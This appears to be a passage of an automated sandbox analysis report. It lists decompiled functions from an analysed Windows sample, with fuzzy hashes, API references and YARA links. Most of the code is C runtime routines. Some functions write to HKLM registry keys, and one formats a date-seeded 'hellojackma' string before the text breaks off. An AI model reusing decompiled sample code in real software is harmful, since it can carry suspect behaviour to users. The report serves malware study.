Instruction ID: 27cf5cec958d878707709140bf2fb96cf6b521a630f13871181a3c8bb6886863
Opcode Fuzzy Hash: 524f1c695f1160f68b5294df42e5c05ff8f1d2ed090cbbe519f1d9c4e8f21ccd
Instruction Fuzzy Hash: 9151D371904209EFCB11CF68CD80A9E7BB5FF45340F2181BAE916EB291D734EA50CB69

Uniqueness

Uniqueness Score: -1.00%

Function 100181BA, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100181BA(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D555( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A7B( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F780(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x100181c2
0x100181c9
0x100181de
0x00000000
0x100181d0
0x100181d2
0x100181ea
0x100181ef
0x100181f2
0x100181f5
0x1001821e
0x10018223
0x10018227
0x100182a8
0x100182ba
0x100182c3
0x100182c5
0x10018205
0x10018205
0x10018208
0x1001820a
0x1001820d
0x1001820d
0x1001820d
0x1001820d
0x00000000
0x10018213
0x10018287
0x10018287
0x1001828c
0x10018292
0x10018295
0x10018297
0x1001829a
0x1001829a
0x1001829a
0x1001829a
0x00000000
0x1001829e
0x10018229
0x1001822c
0x1001822c
0x10018232
0x10018235
0x1001825c
0x1001825f
0x1001825f
0x10018265
0x00000000
0x00000000
0x10018267
0x1001826a
0x00000000
0x00000000
0x1001826c
0x1001826c
0x1001826f
0x1001826f
0x10018275
0x100181e3
0x100181e3
0x1001827e
0x00000000
0x1001827e
0x10018237
0x1001823a
0x00000000
0x00000000
0x1001823e
0x1001824c
0x1001824f
0x10018255
0x10018257
0x1001825a
0x00000000
0x00000000
0x00000000
0x1001825a
0x100181f7
0x100181fa
0x100181fc
0x10018202
0x10018202
0x00000000
0x100181d4
0x100181d4
0x100181d9
0x100181db
0x100181db
0x00000000
0x100181d9
0x100181d2

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100181EA
__isleadbyte_l.LIBCMT ref: 1001821E
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 1001824F
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016BDE,?,?,00000002), ref: 100182BD

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
Instruction ID: d5078d4910217e7b4ecb4b559098acf50bee0a5cb4f006de64edc12b54e59432
Opcode Fuzzy Hash: 055a8c03e4689a610b2b33372239977322d8b4542b05d195dfabf953701ab400
Instruction Fuzzy Hash: 6131B031A00256EFDB12CFA4CC84AAE7BF9FF01251F168569E8609F091E730DB81DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C9F5, Relevance: 6.1, APIs: 4, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E1000C9F5(signed char __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi) {
				signed char _t12;
				intOrPtr* _t20;
				intOrPtr _t23;
				signed char _t37;
				intOrPtr _t40;
				signed int _t42;

				_t36 = __edx;
				_t11 = __eax;
				do {
					 *_t11 =  *_t11 + _t36;
					asm("rol dh, 1");
					 *_t11 =  *_t11 + _t36;
					_t12 = _t11 ^ 0x000000ba;
					 *_t12 =  *_t12 + _t36;
					asm("adc al, 0xbe");
					 *_t12 =  *_t12 + _t36;
					_t37 = _t36 & _t12;
					 *_t12 =  *_t12 + _t37;
					 *_t12 = 0x10;
					asm("movsd");
					 *_t12 =  *_t12 + _t37;
					asm("rol dword [eax], 0x10");
					_t36 = 0xc5;
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					_push(ss);
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					 *0xFFFFFFFF7A7B2000 =  *((intOrPtr*)(0xffffffff7a7b2000)) + 0xc5;
					 *(0xffffffff7a7b2000 & _t42) =  *(0xffffffff7a7b2000 & _t42) + 0xc5;
					_t11 = 0xbc671000;
					 *0xbc671000 =  *0xbc671000 + 0xc5;
				} while ( *0xbc671000 >= 0);
				 *0xbc671000 =  *0xbc671000 + 0xc5;
				asm("les eax, [eax]");
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103315c0);
				_t18 = E10010594(0xbc671000, __edi, 0xc2af1000);
				_t40 =  *((intOrPtr*)(_t42 + 8));
				if(_t40 != 0) {
					if( *0x10337f3c != 3) {
						_push(_t40);
						goto L10;
					} else {
						L1000FA63(4);
						 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
						_t23 = E1000FADC(_t40);
						 *((intOrPtr*)(_t42 - 0x1c)) = _t23;
						if(_t23 != 0) {
							_push(_t40);
							_push(_t23);
							E1000FB07();
						}
						 *(_t42 - 4) = 0xfffffffe;
						_t18 = E1000CA96();
						if( *((intOrPtr*)(_t42 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t42 + 8)));
							L10:
							_t18 = HeapFree( *0x10335310, 0, ??);
							_t48 = _t18;
							if(_t18 == 0) {
								_t20 = E1000F780(_t48);
								 *_t20 = E1000F745(GetLastError());
							}
						}
					}
				}
				return E100105D9(_t18);
			}

0x1000c9f5
0x1000c9f5
0x1000c9fa
0x1000c9fa
0x1000c9fc
0x1000c9fe
0x1000ca00
0x1000ca02
0x1000ca04
0x1000ca06
0x1000ca08
0x1000ca0a
0x1000ca0d
0x1000ca10
0x1000ca16
0x1000ca19
0x1000ca1c
0x1000ca1e
0x1000ca20
0x1000ca26
0x1000ca2a
0x1000ca2e
0x1000ca31
0x1000ca36
0x1000ca36
0x1000ca3a
0x1000ca3d
0x1000ca3f
0x1000ca40
0x1000ca42
0x1000ca47
0x1000ca4c
0x1000ca51
0x1000ca5a
0x1000ca9f
0x00000000
0x1000ca5c
0x1000ca5e
0x1000ca64
0x1000ca69
0x1000ca6f
0x1000ca74
0x1000ca76
0x1000ca77
0x1000ca78
0x1000ca7e
0x1000ca7f
0x1000ca86
0x1000ca8f
0x1000ca91
0x1000caa0
0x1000caa8
0x1000caae
0x1000cab0
0x1000cab2
0x1000cac5
0x1000cac7
0x1000cab0
0x1000ca8f
0x1000ca5a
0x1000cacd

APIs

___sbh_find_block.LIBCMT ref: 1000CA69
___sbh_free_block.LIBCMT ref: 1000CA78
HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: 3bef494b8fa5bc0c0bfd4821817cd3570d592744cb6803e220000cb7805236df
Instruction ID: 200fe6de2411e5f3ceebb4e29ace5decc6a6fb01bbe72e299d0e2431d26b974a
Opcode Fuzzy Hash: 3bef494b8fa5bc0c0bfd4821817cd3570d592744cb6803e220000cb7805236df
Instruction Fuzzy Hash: EC21F17AA0D3895FEB03CB704C85A893F60DF072D5F0A00DAE0449B1E7EA748D09CB52

Uniqueness

Uniqueness Score: -1.00%

Function 1001A3D0, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A3D0(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAD0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CEAF(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF80(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}

0x1001a3d6
0x1001a3e9
0x1001a402
0x1001a408
0x1001a415
0x1001a41b
0x1001a426
0x1001a442
0x1001a44e
0x1001a45a

APIs

_strlen.LIBCMT ref: 1001A3E1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
_memset.LIBCMT ref: 1001A426
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_memset_strlen
String ID:
API String ID: 745779501-0
Opcode ID: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
Instruction ID: 8dd7a9ca22c507c9c9ca29094530ba01303feab9f029a6df08f7648fa224dc70
Opcode Fuzzy Hash: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
Instruction Fuzzy Hash: 1D11F1B9E00208BFEB14CFD4D895F9EB7B4EB48704F108198FA099B381D671AA058B91

Uniqueness

Uniqueness Score: -1.00%

Function 00402B80, Relevance: 6.0, APIs: 4, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B80(void* _a4, char* _a8, char _a12) {
				long _t13;
				char* _t23;

				_t23 = _a4;
				if(RegOpenKeyExA(0x80000002, _t23, 0, 0x102,  &_a4) == 0 || RegCreateKeyExA(0x80000002, _t23, 0, 0, 0, 0xf013f, 0,  &_a4, 0) == 0) {
					_t13 = RegSetValueExA(_a4, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_a4);
					return 0 | _t13 == 0x00000000;
				} else {
					return 0;
				}
			}

0x00402b85
0x00402b9f
0x00402bde
0x00402beb
0x00402bf9
0x00402bc5
0x00402bc8
0x00402bc8

APIs

RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00000102,?), ref: 00402B97
RegCreateKeyExA.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402BBB
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402BEB

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateOpenValue
String ID:
API String ID: 776291540-0
Opcode ID: e67dd30e4998f12c05531f5aa9724ed1f1c816c8c9d0428bf3833eaab55c34ae
Instruction ID: ad08d0a4e727adc7a06136ec506084d49ae250f6fb43ebd82b7ce4284d3e4376
Opcode Fuzzy Hash: e67dd30e4998f12c05531f5aa9724ed1f1c816c8c9d0428bf3833eaab55c34ae
Instruction Fuzzy Hash: 17013171354311BBF2208B60DD0AF7B77A8EB84B50F10881CBB54BA2D4D6B0E840C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 1000CA40, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E1000CA40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103315c0);
				_t8 = E10010594(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E100105D9(_t8);
				}
				if( *0x10337f3c != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10335310, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F780(_t31);
						 *_t10 = E1000F745(GetLastError());
					}
					goto L9;
				}
				L1000FA63(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FADC(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FB07();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA96();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x1000ca40
0x1000ca42
0x1000ca47
0x1000ca4c
0x1000ca51
0x1000cac8
0x1000cacd
0x1000cacd
0x1000ca5a
0x1000ca9f
0x1000caa0
0x1000caa8
0x1000caae
0x1000cab0
0x1000cab2
0x1000cac5
0x1000cac7
0x00000000
0x1000cab0
0x1000ca5e
0x1000ca64
0x1000ca69
0x1000ca6f
0x1000ca74
0x1000ca76
0x1000ca77
0x1000ca78
0x1000ca7e
0x1000ca7f
0x1000ca86
0x1000ca8f
0x00000000
0x1000ca91
0x1000ca91
0x00000000
0x1000ca91

APIs

___sbh_find_block.LIBCMT ref: 1000CA69
___sbh_free_block.LIBCMT ref: 1000CA78
HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID:
API String ID: 2661975262-0
Opcode ID: f415d4f7b6aaaaeb9115a185c126b32be0306c5f0fa7f1318f6c47c720f3fa77
Instruction ID: e3735d432595b220704bcada92be5b3c7af02f538283d01a36ccf585f758a077
Opcode Fuzzy Hash: f415d4f7b6aaaaeb9115a185c126b32be0306c5f0fa7f1318f6c47c720f3fa77
Instruction Fuzzy Hash: 77016775A0571AAAFB10DBB08C86F5E3AA4EF023E5F210109F508AA0D5DF34A940DF56

Uniqueness

Uniqueness Score: -1.00%

Function 1001F5D0, Relevance: 6.0, APIs: 4, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001F5D0() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F2F0(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}

0x1001f5d6
0x1001f5dc
0x1001f5e2
0x1001f5e8
0x1001f5ee
0x1001f5f4
0x1001f5fa
0x1001f604
0x1001f612
0x1001f620
0x1001f629
0x1001f62f
0x1001f640
0x1001f643
0x1001f64f

APIs

GetSystemTime.KERNEL32(?), ref: 1001F604
SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F612
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F620
__aulldiv.LIBCMT ref: 1001F63B

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Time$System$File$__aulldiv
String ID:
API String ID: 3735792614-0
Opcode ID: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
Instruction ID: af96395ebe124ed86fc63cf5983e6bcf699a861f8abc8f1b8a76f2a7ba2cf47c
Opcode Fuzzy Hash: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
Instruction Fuzzy Hash: A501E575D1021DEADB00DFD4C8899EEB7B8FF04304F104649E904A7250EB79668ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00402B10, Relevance: 6.0, APIs: 4, Instructions: 38
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B10(void* _a4, char* _a8, char _a12) {
				long _t13;
				char* _t23;

				_t23 = _a4;
				if(RegOpenKeyA(0x80000002, _t23,  &_a4) == 0 || RegCreateKeyA(0x80000002, _t23,  &_a4) == 0) {
					_t13 = RegSetValueExA(_a4, _a8, 0, 4,  &_a12, 4);
					RegCloseKey(_a4);
					return 0 | _t13 == 0x00000000;
				} else {
					return 0;
				}
			}

0x00402b11
0x00402b28
0x00402b58
0x00402b65
0x00402b73
0x00402b3f
0x00402b42
0x00402b42

APIs

RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00402B20
RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 00402B35
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00402B58
RegCloseKey.ADVAPI32(?), ref: 00402B65

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateOpenValue
String ID:
API String ID: 776291540-0
Opcode ID: 4fffc15b6b3d582784c294c3cc734a10fac99c4c80815db6eb7a54933496e82f
Instruction ID: d245c1feb1c9cef44fd5f91d5bae3c9617faa7c0462537c3c4e14eb803ddf16c
Opcode Fuzzy Hash: 4fffc15b6b3d582784c294c3cc734a10fac99c4c80815db6eb7a54933496e82f
Instruction Fuzzy Hash: 10F09671114312BFE624CF20DD48FAB7BE8EF84754F04881CBA44E22A0D770EC40C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 00408A8A, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408A8A(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x410af8,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E004090EB(1,  &_v280, 0x100,  &_v1304,  *0x410af8,  *0x410d24, 0);
						E004081AA( *0x410d24, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x410af8, 0);
						E004081AA( *0x410d24, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x410af8, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x410b20) =  *(_t55 + 0x410b20) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x410c21) =  *(_t55 + 0x410c21) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x410b20) = _t77;
								goto L16;
							}
							 *(_t55 + 0x410c21) =  *(_t55 + 0x410c21) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x410b20) =  *(_t43 + 0x410b20) & 0x00000000;
						} else {
							 *(_t43 + 0x410c21) =  *(_t43 + 0x410c21) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x410c21) =  *(_t43 + 0x410c21) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x410b20) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00408aa7
0x00408aad
0x00408ab4
0x00408ab4
0x00408abb
0x00408abc
0x00408ac0
0x00408ac3
0x00408acc
0x00408b05
0x00408b24
0x00408b48
0x00408b70
0x00408b78
0x00408b7a
0x00408b80
0x00408b80
0x00408b86
0x00408ba1
0x00408bb3
0x00000000
0x00408bb3
0x00408ba3
0x00408baa
0x00408b96
0x00408b96
0x00000000
0x00408b96
0x00408b88
0x00408b8f
0x00000000
0x00408bba
0x00408bba
0x00408bbc
0x00408bbd
0x00000000
0x00408b80
0x00408ad0
0x00408ad3
0x00408ad3
0x00408ad6
0x00408adb
0x00408adf
0x00408ae6
0x00408aee
0x00408af8
0x00408af8
0x00408af8
0x00408afb
0x00408afc
0x00408aff
0x00000000
0x00408b04
0x00408bc3
0x00408bca
0x00408bcd
0x00408beb
0x00408c00
0x00408bf2
0x00408bf2
0x00408bfb
0x00000000
0x00408bfb
0x00408bd4
0x00408bd4
0x00408bdd
0x00408be0
0x00408be0
0x00408be0
0x00408c07
0x00408c08
0x00408c0e

APIs

GetCPInfo.KERNEL32(?), ref: 00408A9E

Strings

, xrefs: 00408AE7
, xrefs: 00408AC3

Memory Dump Source

Source File: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: e9bc240eaf728152c3c56a4c4f05592c4888a033a2c4116666d2d63552bb07be
Instruction ID: ddf649e54e9f03be24ddff7d6348d85147b2ca67cb3d7c0e4ae33ec857c9a532
Opcode Fuzzy Hash: e9bc240eaf728152c3c56a4c4f05592c4888a033a2c4116666d2d63552bb07be
Instruction Fuzzy Hash: 17418A310082585EEB158754CE59BEB3FF99B05304F0404FAE5C5EA1D3CAB85984CBAE

Uniqueness

Uniqueness Score: -1.00%

Function 10022BBB, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10022BBB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t71;
				void* _t78;

				_t78 = __eflags;
				_push( *(_t71 - 0x1e) & 0x0000ffff);
				E1000CCA3(__edi, _t71 - 0x12c, "hellojackma%04d%02d5",  *(_t71 - 0x20) & 0x0000ffff);
				 *((intOrPtr*)(_t71 - 0x10)) = E1001A4E0(__ebx,  *(_t71 - 0x20) & 0x0000ffff, __edi, __esi, _t78, _t71 - 0x12c);
				 *((intOrPtr*)(_t71 - 0x2f4)) = E10001160(_t71 - 0x27c, _t78,  *((intOrPtr*)(_t71 - 0x10)));
				 *((intOrPtr*)(_t71 - 0x2f8)) =  *((intOrPtr*)(_t71 - 0x2f4));
				 *((char*)(_t71 - 4)) = 0xb;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x2f8)));
